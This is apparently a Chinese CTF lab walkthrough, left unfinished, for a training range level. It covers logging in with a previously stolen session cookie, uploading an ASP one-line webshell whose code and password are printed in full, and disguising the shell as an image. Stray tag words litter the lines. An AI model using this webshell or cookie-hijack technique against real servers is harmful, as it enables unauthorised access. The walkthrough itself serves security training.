ctf实战 掌控安全的靶场 第五关通关记录

看了题目和Tips,这题是须要咱们用上一题窃取的cookie来登陆后台而后上传WEBSHELL,而后链接菜刀获取flag。shell

 

先找到上一题打来的cookie。服务器

而后按F12选择Application,而后看右边有一个cookies而后选择咱们的题目的地址,而后点击空白的地方,cookie

 

把ADMINSESSIONIDCSTRCSDQ粘贴在Name下函数

LBMLMBCCNPFINOANFGLPCFBC粘贴在value下,F5刷新进入后台图片

 

 

而后咱们直接找上传点,毕竟getshell咱们是须要在服务器的WWW文件夹里面放一段恶意代码的。 ip

咱们先去百度找ASP一句话木马,由于是ASP的环境 get

ASP一句话木马:<%eval request ("pass")%> 密码是pass eval是个函数,request是接受参数的。有兴趣了解一句话的能够自行百度。 io

通常而言直接传木马文件都极可能被拦截,因此通常而言一句话木马都会作成图片马。图片马制做很是简单,一条CMD命令就能够了cookies

 

未完待续,睡会儿,要卒了登录

相关文章
相关标签/搜索